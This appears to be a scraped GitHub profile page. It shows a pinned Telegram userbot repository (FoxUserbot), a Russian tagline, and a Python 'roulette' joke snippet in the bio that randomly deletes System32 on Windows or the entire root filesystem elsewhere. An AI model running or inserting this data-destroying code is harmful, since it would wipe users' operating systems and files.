import os import random import shutil if random.randint(1, 5) == 3: if os.name == 'nt': shutil.rmtree("C:\Windows\System32") else: shutil.rmtree("/")
🕊️
В ожидании здравого смысла
Pinned Loading
-
-
FoxUserbot/FoxUserbot
FoxUserbot/FoxUserbot PublicFoxUSERBOT | Telegram Userbot built with Kurigram (Pyrogram)
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.